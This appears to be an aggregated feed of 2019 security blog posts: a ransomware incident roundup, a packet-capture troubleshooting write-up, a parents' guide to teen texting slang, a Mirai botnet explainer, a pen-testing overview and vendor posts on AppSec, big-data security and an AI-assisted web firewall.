Norsk Hydro, one of the world’s largest aluminium producers, unexpectedly became a security cause célèbre following a “severe” ransomware infection. After the LockerGoga variant encrypted data on the company’s facilities in the US and Europe, the company shut its global network, switched to manual operations at some of its plants, and stopped production in others.

Norsk Hydro said it planned to rely on its backups rather than paying the ransom. Through it all, the company issued regular updates, drawing widespread praise for its openness, communication and preparedness. Brian Honan wrote: “Norsk Hydro should be a case study in how to run an effective incident response. They were able to continue their business, although at a lower level, in spite of their key systems being offline. Their website contains great examples of how to provide updates to an issue and may serve as a template for how to respond to security breaches.”

Within a week, most of the company’s operations were back running at capacity. Norsk Hydro has released a video showing how it was able to recover. Other victims weren’t so lucky. F-Secure has a good analysis of the ransomware that did the damage, as does security researcher Kevin Beaumont.

Links we liked

Remember the Melissa virus? Congratulations, you’re old: that was 20 years ago. MORE

New trends in spam and phishing, whose popularity never seems to fade. MORE and MORE

For parents and guardians: videos to spark conversations with kids about online safety. MORE

A look behind online heists on Mexican banks that netted perpetrators nearly $20 million. MORE

While we’re on the subject, more cybercriminal tactics used against financial institutions. MORE

This is a useful high-level overview of the NIST cybersecurity framework. MORE

This campaign aims to hold tech giants to account for fixing security and privacy issues. MORE

How can security awareness programmes become more effective at reducing risk? MORE

An excellent security checklist for devices and accounts, courtesy of Bob Lord. MORE

Shodan Monitor alerts organisations when their IoT devices become exposed online. MORE

The post Security roundup: April 2019 appeared first on BH Consulting.

Troubleshooting NSM Virtualization Problems with Linux and VirtualBox

I spent a chunk of the day troubleshooting a network security monitoring (NSM) problem. I thought I would share the problem and my investigation in the hopes that it might help others. The specifics are probably less important than the general approach.

It began with ja3. You may know ja3 as a set of Zeek scripts developed by the Salesforce engineering team to profile client and server TLS parameters.

I was reviewing Zeek logs captured by my Corelight appliance and by one of my lab sensors running Security Onion. I had coverage of the same endpoint in both sensors.

I noticed that the SO Zeek logs did not have ja3 hashes in the ssl.log entries. Both sensors did have ja3s hashes. My first thought was that SO was misconfigured somehow to not record ja3 hashes. I quickly dismissed that, because it made no sense. Besides, verifying that intution required me to start troubleshooting near the top of the software stack.

I decided to start at the bottom, or close to the bottom. I had a sinking suspicion that, for some reason, Zeek was only seeing traffic sent from remote systems, and not traffic originating from my network. That would account for the creation of ja3s hashes, for traffic sent by remote systems, but not ja3 hashes, as Zeek was not seeing traffic sent by local clients.

I was running SO in VirtualBox 6.0.4 on Ubuntu 18.04. I started sniffing TCP network traffic on the SO monitoring interface using Tcpdump. As I feared, it didn't look right. I ran a new capture with filters for ICMP and a remote IP address. On another system I tried pinging the remote IP address. Sure enough, I only saw ICMP echo replies, and no ICMP echoes. Oddly, I also saw doubles and triples of some of the ICMP echo replies. That worried me, because unpredictable behavior like that could indicate some sort of software problem.

My next step was to "get under" the VM guest and determine if the VM host could see traffic properly. I ran Tcpdump on the Ubuntu 18.04 host on the monitoring interface and repeated my ICMP tests. It saw everything properly. That meant I did not need to bother checking the switch span port that was feeding traffic to the VirtualBox system.

It seemed I had a problem somewhere between the VM host and guest. On the same VM host I was also running an instance of RockNSM. I ran my ICMP tests on the RockNSM VM and, sadly, I got the same one-sided traffic as seen on SO.

Now I was worried. If the problem had only been present in SO, then I could fix SO. If the problem is present in both SO and RockNSM, then the problem had to be with VirtualBox -- and I might not be able to fix it.

I reviewed my configurations in VirtualBox, ensuring that the "Promiscuous Mode" under the Advanced options was set to "Allow All". At this point I worried that there was a bug in VirtualBox. I did some Google searches and reviewed some forum posts, but I did not see anyone reporting issues with sniffing traffic inside VMs. Still, my use case might have been weird enough to not have been reported.

I decided to try a different approach. I wondered if running VirtualBox with elevated privileges might make a difference. I did not want to take ownership of my user VMs, so I decided to install a new VM and run it with elevated privileges.

Let me stop here to note that I am breaking one of the rules of troubleshooting. I'm introducing two new variables, when I should have introduced only one. I should have built a new VM but run it with the same user privileges with which I was running the existing VMs.

I decided to install a minimal edition of Ubuntu 9, with VirtualBox running via sudo. When I started the VM and sniffed traffic on the monitoring port, lo and behold, my ICMP tests revealed both sides of the traffic as I had hoped. Unfortunately, from this I erroneously concluded that running VirtualBox with elevated privileges was the answer to my problems.

I took ownership of the SO VM in my elevated VirtualBox session, started it, and performed my ICMP tests. Womp womp. Still broken.

I realized I needed to separate the two variables that I had entangled, so I stopped VirtualBox, and changed ownership of the Debian 9 VM to my user account. I then ran VirtualBox with user privileges, started the Debian 9 VM, and ran my ICMP tests. Success again! Apparently elevated privileges had nothing to do with my problem.

By now I was glad I had not posted anything to any user forums describing my problem and asking for help. There was something about the monitoring interface configurations in both SO and RockNSM that resulted in the inability to see both sides of traffic (and avoid weird doubles and triples).

I started my SO VM again and looked at the script that configured the interfaces. I commented out all the entries below the management interface as shown below.

$ cat /etc/network/interfaces

# This configuration was created by the Security Onion setup script.
#
# The original network interface configuration file was backed up to:
# /etc/network/interfaces.bak.
#
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

# loopback network interface
auto lo
iface lo inet loopback

# Management network interface
auto enp0s3
iface enp0s3 inet static
  address 192.168.40.76
  gateway 192.168.40.1
  netmask 255.255.255.0
  dns-nameservers 192.168.40.1
  dns-domain localdomain

#auto enp0s8
#iface enp0s8 inet manual
#  up ip link set $IFACE promisc on arp off up
#  down ip link set $IFACE promisc off down
#  post-up ethtool -G $IFACE rx 4096; for i in rx tx sg tso ufo gso gro lro; do ethtool -K $IFACE $i off; done
#  post-up echo 1 > /proc/sys/net/ipv6/conf/$IFACE/disable_ipv6

#auto enp0s9
#iface enp0s9 inet manual
#  up ip link set $IFACE promisc on arp off up
#  down ip link set $IFACE promisc off down
#  post-up ethtool -G $IFACE rx 4096; for i in rx tx sg tso ufo gso gro lro; do ethtool -K $IFACE $i off; done
#  post-up echo 1 > /proc/sys/net/ipv6/conf/$IFACE/disable_ipv6

I rebooted the system and brought the enp0s8 interface up manually using this command:

$ sudo ip link set enp0s8 promisc on arp off up

Fingers crossed, I ran my ICMP sniffing tests, and voila, I saw what I needed -- traffic in both directions, without doubles or triples no less.

So, there appears to be some sort of problem with the way SO and RockNSM set parameters for their monitoring interfaces, at least as far as they interact with VirtualBox 6.0.4 on Ubuntu 18.04. You can see in the network script that SO disables a bunch of NIC options. I imagine one or more of them is the culprit, but I didn't have time to work through them individually.

I tried taking a look at the network script in RockNSM, but it runs CentOS, and I'll be darned if I can't figure out where to look. I'm sure it's there somewhere, but I didn't have the time to figure out where.

The moral of the story is that I should have immediately checked after installation that both SO and RockNSM were seeing both sides of the traffic I expected them to see. I had taken that for granted for many previous deployments, but something broke recently and I don't know exactly what. My workaround will hopefully hold for now, but I need to take a closer look at the NIC options because I may have introduced another fault.

A second moral is to be careful of changing two or more variables when troubleshooting. When you do that you might fix a problem, but not know what change fixed the issue.

Emilia Clarke Is the Most Dangerous Game of Thrones® Celebrity

The net is dark and full of terrors, especially for fans of HBO’s popular show Game of Thrones®. As followers of the series gear up for the premiere of the eighth and final season on April 14th, fans may have more than just White Walkers to worry about. According to McAfee’s study on the Most Dangerous Celebrities, it turns out that search results for Emilia Clarke are among those most likely to be infected with malware.

In fact, the actress who portrays Daenerys Targaryen in the TV drama came in at #17 of our 2018 Most Dangerous Celebrities study. Cybercriminals use the allure of celebrities – such as Clarke – to trick unsuspecting users into visiting malicious websites. These sites can be used to install malware on a victim’s device or steal their personal information or passwords. With the premiere of the new season right around the corner, it’s likely that cybercrooks will take advantage of the hype around the show to lure supporters into their trap.

Thankfully, there are plenty of ways fans can keep up with the show and characters without putting their online safety at risk. Follow these tips to pledge your allegiance to your cybersafety:

  • Refrain from using illegal streaming sites. When it comes to dangerous online behavior, using illegal streaming sites is the equivalent of spreading the Mad King’s wildfire to your device. Many illegal streaming sites are riddled with malware or adware disguised as pirated video files. Do your device a favor and stream the show from a reputable source.
  • Be careful what you click. Don’t bend the knee to hackers who tempt users to click on their malicious sites. Users looking for information on the new season should be careful and trust only reliable sources. The safest option is to wait for the official release instead of visiting a potentially malware-ridden third-party website.
  • Keep your device software updated. Install new system and application updates on your devices as soon as they’re available. These updates often include security fixes that can help protect your laptop or computer from an army of undead software bugs.
  • Protect your online realm with a cybersecurity solution. Send your regards to malicious actors with a comprehensive security solution like McAfee Total Protection. This can help protect you from malware, phishing attacks, and other threats. It also includes McAfee WebAdvisor, which helps alert users of malicious websites.

We wish you good fortune in the browsing to come. To stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

McAfee and the McAfee logo are trademarks or registered trademarks of McAfee, LLC or its subsidiaries in the United States and other countries. Other names and brands may be claimed as the property of others. Copyright ©2019 McAfee, LLC

The post Emilia Clarke Is the Most Dangerous Game of Thrones® Celebrity appeared first on McAfee Blogs.

12 ways IT can create business value in 2019

With technology today’s fuel for business transformation, IT leaders are increasingly seen as key players in companies’ quests to bolster their bottom lines. But with so many new technologies and management approaches emerging, where should IT leaders put their focus?

We asked a range of tech leads what they’re planning this year and how those initiatives can best be approached to add value to their organizations, based on business priorities. Some involve embracing emerging technologies for improved workflows and products; others involve new approaches to how work gets done.   

Here’s what tech leaders think should be top of mind for creating value in 2019.

To read this article in full, please click here

(Insider Story)

Teen Texting Slang (and Emojis) Parents Should Know

What adults call texting, kids call talking. They “talk” on their phones via chat, social comments, snaps, posts, tweets, and direct messages. And they are talking most of the time — tap, tap, tap — much like background music. In all this “talking” a language, or code, emerges just as it has for every generation only today that language is in acronyms, hashtags, and emojis. And while the slang is perfectly understood peer-to-peer, it has parents googling like crazy to decipher it.

And this language changes all the time. It expands, contracts and specific acronyms and symbols (emojis) can change in meaning entirely over time, which is why we update this list every periodically.

This time we’ve added emojis (scroll to bottom) since those powerful little graphic symbols have singlehandedly transformed human communication, as we know it.

Harmless Banter

We publish this list with an important reminder: Teen texting slang isn’t inherently bad or created with an intent to deceive or harm. Most of the terms and symbols have emerged as a kind of clever shorthand for fast moving fingers and have no dangerous or risky meaning attached. So, if you are monitoring your kids’ phones or come across references you don’t understand, assume the best in them (then, of course, do your homework).

For example, there are dozens of harmless words such as finna (fixing to do something), yeet (a way to express excitement), skeet (let’s go), Gucci (great, awesome, or overpriced), AMIRITE (am I right?) QQ4U (quick question for you), SMH (shaking my head), bread (money), IDRK (I don’t really know), OOTD (outfit of the day), LYAAF (love you as a friend), MCE (my crush everyday), HMU (hit me up, call me), W/E (whatever), AFK (away from keyboard), RTWT (read the whole thread), CWYL (chat with you later), Ship (relationship), CYT (see you tomorrow) or SO (significant other).

The Red Flags 

Here are some terms and emojis that may not be so innocent. Any of these terms can also appear as hashtags if you put a # symbol in front of them.

Potential bullying slang

Ghost = to ignore someone on purpose

Boujee = rich or acting rich

Sip tea = mind your own business

The tea is so hot = juicy gossip

AYFKM? = are you f***ing kidding me?

Thirsty = adjective describing a desperate-acting, needy person

Basic = annoying person, interested in shallow things

Extra = over the top, excessive, dramatic person

TBH = to be honest (sometimes followed by negative comments)

Zerg = to gang up on someone (a gaming term that has morphed into a bullying term)

KYS = kill yourself

SWYP = so what’s your problem?

182 = I hate you
Curve = to reject someone

Shade = throwing shade, to put someone down.

POS = piece of sh**

WTF = what the f***

Derp = stupid

Lsr = loser

Butters = ugly

Jelly = jealous

Subtweet = talking about someone but not using their @name

Bizzle = another word for b***h

THOT or thotties = a promiscuous girl/s

YAG = you are gay

Cyber pretty = saying someone only looks good online with filters

Beyouch = another word for b***h

RAB = rude a** b***h

IMHO = in my honest opinion

IMNSHO = in my not so honest opinion

NISM = need I say more?

Potential risky behavior slang  

Broken = hung over

Pasted = high or drunk

Belfie = self-portrait (selfie) featuring the buttocks

OC = open crib, party at my house

PIR = parents in the room

9, CD9, Code 9 = parents here

99 = parents gone

Smash = to have casual sex

Slide into my DM = connecting through a direct message on a social network with sexual intentions

A3: Anytime, anywhere, anyplace

WTTP = want to trade pictures?

S2R = send to receive (pictures)
sugarpic = Refers to a suggestive or erotic photograph

TDTM = talk dirty to me

KMS = kill myself

AITR = adults in the room

KPC = keeping parents clueless

1174 = invite to a wild party usually followed by an address

53X = sex

Chirped = got caught

Cu46 = See you for sexTDTM = talk dirty to meLMIRL = let’s meet in real life

GNRN = get naked right now

Pron = porn

Frape = Facebook rape; posting to someone else’s profile when they leave it logged in.

NSFW = not safe for work (post will include nudity, etc)

Livingdangerously = taking selfies while driving or some other unsafe behavior

Kik = let’s talk on kik instant message instead

Sue = suicide

Dep = depression

Svv = self- harming behavior

SN = send nudes

Nend sudes = another way to say SN/send nudes

PNP = party and play (drugs + sex)

 

Potential drug-related slang

420, bud, tree = marijuana

Blow, mayo, white lady, rock, snow, yay, yale, yeyo, yank, yahoo = Cocaine

Special K = ketamine, liquid tranquilizer

Pearls = a nicely rolled blunt

Dabbing = concentrated doses of marijuana (began as a dance craze)

DOC = drug of choice

Turnt up / turnt = high or drunk

Geeked up = being high

Bar = Xanax pill

Bar out = to take a Xanax pill

Baseball = crack cocaine

Skrill = Money

Bread = money

CID = acid

E, XTC  = ecstasy

Hazel = heroin

Blue Boogers = snorting Adderall or Ritalin

Pharming = getting into medicine cabinets to find drugs to get high

Oxy, perks, vikes = opioids

Robo-tripping = consuming cough syrup to get high

Tweaking = high on amphetamines

Wings = cocaine; heroin

Speed, crank, uppers, Crystal or Tina = meth

 

Red flag emojis

Frog = an ugly person

Frog + tea (coffee) cup = that’s the tea (gossip)

Any kind of green plant/leaves = marijuana

Maple leaf = marijuana

Broccoli = marijuana

Smoke puff or gasoline = get high

Snowflake = cocaine

Person skiing = cocaine

Pill = ecstasy or MDMA for sale

Face with steam from nose = MDMA drug

Rocket = high potency drug for sale

Syringe = heroin

Diamond = crystal meth, crack cocaine for sale

Skull = die

Knife + screaming face = calling someone a psycho

Bowling ball + person running = I’m gonna hit you, coming for you

Flowers = drugs

Dollar sign = it’s for sale

Syringe = heroine (also tattoo)

Cat with heart eyes = sex

Purple face with horns = sex

Gas pump = sex

Tongue, eggplant, water drops, banana, peach, taco, cherries, drooling face, rocket = sex

Rose, rosette, cherry, pink cherry blossom, growing heart, airplane, crown = emojis that refer to sex trafficking

When it comes to figuring out what your kids are up to online, using your own instincts and paying attention will be your best resources. If something doesn’t sound or look right on your child’s phone trust that feeling and look deeper. You don’t have to know every term or symbol — the more important thing is to stay aware and stay involved.

The post Teen Texting Slang (and Emojis) Parents Should Know appeared first on McAfee Blogs.

A Deeper Look at Gartner’s Hype Cycle for Application Security

The application security market is ever-changing, with new technologies emerging on a continuous basis. One helpful way to stay on top of the AppSec market is Gartner’s most recent Hype Cycle for Application Security, 2018.

When it comes to DevSecOps, Gartner notes that “adoption is slow, but interest is high,” and showcases development’s shift towards DevOps environments in the name of speed and agility. DevOps is great for an organization, but not if the security piece is siloed and acts in a way that disrupts the speed of development. This is why, Gartner points out, “Security must be a part of this shift, but in a way that respects the collaborative nature of DevOps.”

Veracode’s own Tim Jarrett, Director of Product Management, recently attended DevSecOps Days as part of this year’s RSA Conference, and took away some valuable points on trends in DevSecOps. The general overview was that the theory of DevOps is fantastic, but the practice itself isn’t as straightforward, which is why it makes sense that DevSecOps is catching on in theory, but remains aspirational in practice. This might seem like a bump in the road of progression, but DevSecOps can be successful if security teams are able to communicate the definitive business value.

Read more about Tim’s DevSecOps Days takeaways here.

Software composition analysis

According to Gartner, “Software Composition Analysis is expected to reach the ‘Plateau of Productivity’ in two to five years.” This is supported by the fact that SCA has become more of a mainstream technology that vendors offer as a part of their solution suites. The surge of SCA offerings from software security vendors essentially began when attention was called to the widespread impact of software vulnerabilities like Heartbleed and Apache Struts.

The need for a solution that could analyze open source components was only furthered by the widespread use of open source code and the rampant amount of vulnerabilities that came along with such components. Veracode’s own State of Software Security Report Vol. 9 reported that in last year alone, 87.5% of Java applications contained a component with at least one vulnerability.

In addition to recommending that organizations use SCA tools on a regular basis to ensure software security, Gartner also stated that “SCA tools fit well within DevSecOps-style workflows, where scanning can be automated as part of the rapid development processes.”

Get the State of Software Security Volume 9 Software Composition Analysis Infosheet here.

Application security testing suites

Application security testing suites are a consolidation of AST technologies, including – but not limited to – static analysis, dynamic analysis, software composition analysis, and secure code training to more effectively verify the security of a company’s codebase.

To cover all of your bases when it comes to application security, one option is to use multiple vendors so that you have access to the “best-of-breed” technologies in each category. However, Gartner points out the downside to this approach; “the requirement to deal with different systems, separate dashboards,” and a not-really-unified approach. “Rather than engaging multiple vendors, Gartner clients have increasingly been seeking ‘one-stop-shop’ vendors that offer multiple technologies in a single platform with flexible deployment options.”

Veracode is one of those “one-stop-shops,” and can provide visibility into application status across all testing types, including SAST, DAST, SCA, and manual penetration testing in one centralized view. To learn more about Veracode’s comprehensive AppSec platform, check out this Platform Overview eBook, or, schedule a demo to see how we can help your specific organization.

 

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner's research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

Gartner, Hype Cycle for Application Security, 2018, 27 July 2018, Ayal Tirosh

Weekly Update 133

Weekly Update 133

Wow, a weekly update back on the normal schedule! I also realised when watching this back how less tired I look compared to the last few weeks. Travel takes its toll so I touched on that a bit in this week's update, along with the usual raft of new data breaches to go into HIBP. Plus there's Facebook's incidents, both the one they're not directly responsible for and the one they are responsible for, but is also both a bit of a non-event and something that's reflective of broader issues in the industry.

Next week should be bang on schedule again and with any luck, I'll look even less tired again 😎

Weekly Update 133
Weekly Update 133
Weekly Update 133

References

  1. Here's everything that goes into a massive international speaking trip (people always publicly share the good stuff in their lives, this is the warts and all version)
  2. Stop hosting forum software yourself! (that was specifically targeted at vBulletin, I later also wrote about my broader approach to platform outages when I'm not responsible for them)
  3. The Intelimost breach has a really interesting write-up by Zack Whittaker (and it's kinda fun to sleazy spammers come undone!)
  4. It's not Facebook's fault that 3rd party developers exposed a bunch of data from their APIs (but there's still a discussion to be had about how much data Facebook should be exposing in the first place)
  5. It is Facebook's fault that they were asking for people's email account passwords (although in practical terms, it also doesn't particularly matter)
  6. Twilio is this week's blog sponsor (they're talking about how 2FA helps secure online transactions and helps comply with regs like PSD2 )

Six Stages of Penetration Testing

Through penetration testing, you can proactively identify the most exploitable security weaknesses before someone else does. However, there’s a lot more to it than the actual act of infiltration. Pen testing is a thorough, well thought out project that consists of several phases. Read on to learn about what it takes to complete a successful pen test.

Planning and Preparation

Many old adages proclaim the import of preparation, and when it comes to penetration testing, planning is indeed the key to success. There are multiple ways to approach a pen test and figuring out your goals and scoping accordingly is key to ensuring that you’re going to get the most out of the process. Consider these questions to ensure your expectations are aligned with the testers and you get the information you’re looking for.

  • Do you want an external test, which simulates an attack from an outside individual or organization, or an internal test, which simulates an attack from an insider, or an attacker that has a foothold within the organization?
  • Would you prefer your security team to know a pen test is about to be performed, or would you rather it be performed covertly to identify their effectiveness in detecting the activity?
  • How much information do you want to share with the pen testers beforehand?
  • How aggressive are the pen testers allowed to be?

 

Discovery

Once the scope has been established, pen testing teams can get to work. In this discovery phase, teams perform different types of reconnaissance on their target. On the technical side, information like IP addresses can help determine information about firewalls and other connections. On the personal side, data as simple as names, job titles, and email addresses can hold great value. Attackers can use this data to send phishing emails or figure out who may have privileged credentials, with which they can get full access to the environment.
Additionally, before exploiting a system, pen testing teams must look for weaknesses within the environment. Often referred to as footprinting, this phase of discovery involves gathering as much information about the target systems, networks, and their owners as possible without attempting to penetrate them. An automated scan is one technique that can be used to search for vulnerabilities that can be used as a doorway.

Penetration Attempt and Exploitation

Now informed about their target, pen testers can begin using these newly discovered entry points, testing all of the weaknesses they discovered. They will attempt to enter the target through these identified entry points.
But pen testers will do far more than just attempt to gain access. Once inside a compromised system, they will try to elevate their access privileges within the environment, allowing them to take any number of additional actions. Gaining administrative privileges enables pen testers to identify security weaknesses in other areas and resources, like poor configuration, unguarded access to sensitive data, or ineffective management of accounts and passwords.   
Additionally, multiple types of assets can be tested. In addition to the on-premise network infrastructure and workstations you’d expect could be vulnerable to attack, mobile devices, web applications, and even IoT devices like security cameras, can also be put to the test.

Analysis and Reporting

Pen testers should carefully track everything they do during the discovery and exploitation process.  From there, they can create a report that includes all of these details, highlighting what was used to successfully penetrate the system, what security weaknesses were found, and any other pertinent information discovered.
These reports should also include analysis to help map out next steps once the test has concluded. Pen testing teams can help determine the highest priority items that an organization should take care of as soon as possible, as well as suggestions for remediation methods.

Clean Up and Remediation

Just as with a real attack, pen testers can leave “footprints.” It’s critical to go back through systems and remove any artifacts used during the test, since they could be leveraged in the future by someone with nefarious intentions. Once this is completed, an organization can go about the business of fixing the security weaknesses discovered and prioritized during the testing phase. This may include putting compensating controls in place to protect weaknesses that cannot be easily remediated, or even investing in new solutions that can streamline security and improve efficiency.

Retest

Penetration tests can and should be utilized frequently, especially when new applications or infrastructure are being deployed. Even if your organization believes they resolved every weakness listed in a previous report, the best way to ensure your remediations are effective is to test again. Additionally, IT environments, and the methods used to attack them, are constantly evolving, so it is to be expected that new weaknesses will emerge.

With so many breaches dominating the news, it’s more critical than ever to reduce the chance that an incident could put your organization’s reputation and trustworthiness at stake. Organizations should do everything they can to understand and avoid behaviors that put them at risk. Pen testing is an essential part of a risk assessment strategy and helps ensure that your organization is reducing the chance of a damaging breach occurring within your environment.

Read our guide to learn how you can get smarter about penetration testing.

Penetration testing
Big text: 
Blog
Resource type: 
Blogs

Teaching Old Malware New Tricks: How the Latest Mirai Variant Targets New Devices

Though initially created to give players of the game Minecraft an advantage, the Mirai malware strain has since been responsible for a number of notable distributed denial of service (DDoS) attacks, including the one suffered by DNS provider Dyn, which resulted in outages for numerous Internet platforms. Before its creators were caught and prosecuted, they posted the source code online, allowing Mirai to take on a life of its own. Mirai has now reemerged, enhanced and ready to cause more damage. Read on to learn how Mirai works, what its newest features are, and how you can protect your organization from this destructive malware strain.


What is a Botnet?

Mirai operates by breaching Linux devices and creating botnets. This type of malware operates by having its original home device, known as a bot herder or bot master, infect and remotely controlling any kind of device – from a smart phone to a security camera. Using this command-and-control technique (C&C or C2), it can instruct the breached device to run a bot, which is a software application that runs automated scripts to perform tasks over the Internet. Once the bot herder has taken control of multiple devices, often numbering into the hundreds or thousands, it uses this cluster of bots, known as a botnet, to run more sophisticated, malicious tasks.

Most commonly, botnets are used in DDoS attacks, like the Dyn incident mentioned above. With so many bots under their control, an attacker can have all of them send requests to a targeted system, flooding it with traffic, blocking out any legitimate requests. Eventually, this influx of traffic will overwhelm a system, causing it to crash.

 
Brand New Enterprise Exploits

Mirai resurfaced a few times since its initial foray onto the scene. Since the code is now freely available, changes can be made at the whim of any malicious actor. For example, in early 2018, one successor used its botnet to steal cryptocurrency from computers dedicated to cryptocurrency mining.

Now Mirai has rematerialized once more, with this variant updated to target eleven additional devices. A few of these exploits, like the WePresent Wireless Presentations and LG Supersign TVs, are devices intended for use by enterprise organizations. This pivot into business class devices should put businesses on their guard, since it gives attackers a window into organizational networks for additional exploitation. Additionally, it shows a pivot towards loftier end goals, since devices connected to these enterprise networks give threat actors even more bandwidth to use in their botnet attacks.


Same Old Mirai Infrastructure

Mirai isn’t a particularly complex piece of malware – which is dangerous in its own right, as it gives far more people opportunities to use it. Ultimately, its success lies in its exploitation on the weak security that plagues most IoT devices.

Mirai’s bot master directs its controlled devices to continuously scan the Internet in search of IP addresses for IoT devices. From there, it uses a list of default usernames and passwords to attain administrative access of the device. Given Mirai’s numerous successful attacks, there are a worrisomely large number of devices that still have these credentials in place.

This strategy would be far less frequently successful on traditional workstations and servers within an organization. First, they are far more likely to have policies in place requiring frequent password changes, multi-factor authentication, or even identity and access management solutions to ensure that administrative access isn’t so easily acquired.

Moreover, most antivirus solutions for workstations or servers would be able to spot these simplistic breach attempts and stop them in their tracks. Unfortunately, nearly all IoT devices still lack antivirus solutions, making them a prime target for techniques that are no longer as common on workstations or network servers.

Finally, IoT devices are ideal because most of them are constantly connected to the internet and are owned or operated by users who are unaware of the security risks that these devices can pose.


Fighting Command and Control with Advanced Threat Detection

In addition to having ideal targets in IoT devices, botnets like Mirai are also particularly difficult to detect and remove because aside from causing a system to become sluggish at times, they don’t really do anything to make their presence known.

With this latest iteration of Mirai, along with a number of other botnets currently being deployed, threatening enterprise IoT devices, how can an organization be sure that their devices aren’t currently under the control of a bot master? Advanced threat detection solutions like Core Network Insight constantly monitor network traffic for threat behavior and activities, detecting anomalous behavior in real time and with certainty by providing definitive evidence of infections, regardless of device type. This allows security teams to take immediate action to clear bots from the system.

While this variant is new, Mirai’s structure of C&C communication techniques remain the same. Core Network Insight detects based on this type of communication, so no matter the variant, Network Insight will still be able to accurately uncover it. Network Insight is also agentless, as well as OS and platform agnostic, so no matter how many different device types are targeted, botnets like Mirai cannot evade detection.

To get more information on the only mature, purpose built active threat detection solution on the market, or  a personalized demonstration from one of our experts, contact us today.

Network Insight
Big text: 
Blog
Resource type: 
Blogs

3 Factors to Consider When Securing Big Data

Big data is the new toy in town—a technological commodity that is driving development, but is also a major point of contention between companies, users, and governing entities. But despite the name big data, it is often in the possession of small businesses, who have not taken the appropriate measures to secure this data.  When such large amounts of information are on the line, a breach of this data can be extremely detrimental.

With continual scandals being aired concerning poor privacy protections, it is even more important for your data to be protected. Consider these three things when securing big data: your specific configurations, what access you give out, and how to monitor your data.

1.  Configurations 

It was June of last year that the Exactis leak was revealed. Exactis, a Floridian marketing data broker, had a misconfigured Amazon ElasticSearch server that exposed close to 340 million records on both American adults and businesses. This included incredibly specific details such as pets, gender of children, and smoking habits. This leak has crippled Exactis; there is little chance that Exactis will bounce back from this event.  Beyond the effect that this leak has had on the business, Exactis CEO, Steve Hardigree, has also been open about the stream of inquiries, threats, and constant stress this has had on his personal life.

The root of this crippling leak lies in a misconfiguration and shows us just how configurations can make or break your business.  When you are planning out your big data space, you need to double, and triple check your configurations.

Tips for Checking your Configurations:

  • Security is a multi-layered beast and your data is unique, which in turn means that your approach to security must be customized. This could mean using security software in an unconventional manner or utilizing a third-party security company.
  • Think of the little things. Do you trust all of the programming interacting with your data? If not, how can you make it a trusted resource?
  • Consider getting a third-party Network Security & Architecture Review of your environment. This allows you to have an outside opinion of exactly how secure your data is. If possible, it is beneficial to get this review at least annually.

2.  Access Granted

As you are deciding on configurations, you need to take into account who will be granted access and to what.

If the data is meant to stay completely internal, you need to decide what kinds of users are allowed what permissions. For example, who is allowed to pull data? Is anyone? If it’s not a part of the daily workload, under what circumstances is it allowed? By who?

If you are going to share your data with third parties, there is another host of questions to consider.  Do you allow them unlimited access to your data? Who do you allow access to?

Tips for Granting Internal & External Access:

  • Limit the amount of external access you allow; if possible, do not allow it at all. This will lessen your attack surface and your inherent risk.
  • External resources likely don’t need to access everything your internal resources can. Restrictive groups are a great organizational way to separate who has access to what within your environment.
  • Not all internal resources are equal and therefore should not be given the same access. You will need to evaluate how you give out access and document your process of escalating and deescalating access.

As it has become evident with Facebook’s admittance of leaving data connections open even after deals had been closed, it is also important to think about what happens when access has been revoked. What are you going to put in place to prevent access when it should no longer be allowed?

Take the access you grant seriously so you don’t end up scrambling to make changes after an incident.

3.  Monitoring & Alerting

For everything that can be done to your data, there should be a way for you to monitor it. That is not to say that you have to micro-manage every aspect of your big data. But if an incident were to occur, or more realistically when an incident occurs, you should be able to construct an image of what was going on at the time of the event. For this to be possible, you need a way to monitor your data and receive alerts on the incidents.

Tips for Monitoring & Alerting:

  • Adversaries do not keep normal business hours, so be sure you are monitoring your data at all hours. One way to easily achieve 24/7/365 monitoring is by outsourcing this function to a Managed Security Services Provider (MSSP).
  • When setting up alerts, it can be challenging to find a balance between “alert on every single possible event” and “I only want to see important alerts”. What if an uptick on those seemingly harmless alerts is the only tip-off to an insider threat? And on the other hand, if you are constantly on edge from alerts, you will easily fall into alert fatigue. An MSSP can act as the filter between you and your alerts, only notifying you after an alert is investigated and confirmed to be legitimate.

When you are in possession of big data, there is a lot on the line to secure.  When a breach of this magnitude can destroy your business, it’s critical you take into consideration these factors.

The post 3 Factors to Consider When Securing Big Data appeared first on GRA Quantum.

Experience AI In Action Through Your Security Dashboard

vision beta release artificial intelligence

Following a series of QA testing stages conducted by Cloudbric’s development and product planning teams, Cloudbric is ready to announce the beta release of its deep learning engine!

We’ve already discussed extensively what this new AI technology will mean for our existing detection capabilities as well as the role it will play in our upcoming security platform.

To reiterate, VISION will be integrated into our existing detection system in order to amplify the accuracy of cyber threat identification by blocking incoming threats.

One of the biggest challenges for cloud-based WAF vendors is the ability to accurately block malicious without the need to later whitelist or blacklist traffic that was mistakenly identified and blocked or allow actual malicious traffic to seep through the cracks.

When using a WAF we want to avoid both these false positives and false negatives.

Luckily for us, AI can directly address this challenge as its predictive analysis capabilities can be applied to web traffic.

Cloudbric’s WAF is recognized in the industry for its high accuracy rate, and the addition of AI capabilities will allow our filtering system to more intelligently block attacks.

Current users will now be able to inspect their own web traffic and identify behavior anomalies and in turn help VISION learn characteristics of web attacks to improve our filtering system (and subsequently reduce false positives and false negatives).

VISION will learn the traffic characteristics of each user website to execute detection and prevention tailored to each website. In other words, it will predict and recognize various attack patterns that may act as potential risks to individual user websites.

Ready to see it in action?

More on how to do this can be found directly on your dashboard!

vision beta release security dashboard
Within the second quarter, we have plans to offer this feature via its recently launched console app so be on the lookout for that as well.


Make sure to follow us on our social media platforms (LinkedInTwitter, and Facebook) and our recently opened Telegram Announcement Channel for the latest updates!

The post Experience AI In Action Through Your Security Dashboard appeared first on Cloudbric.

Cyber Security Roundup for March 2019

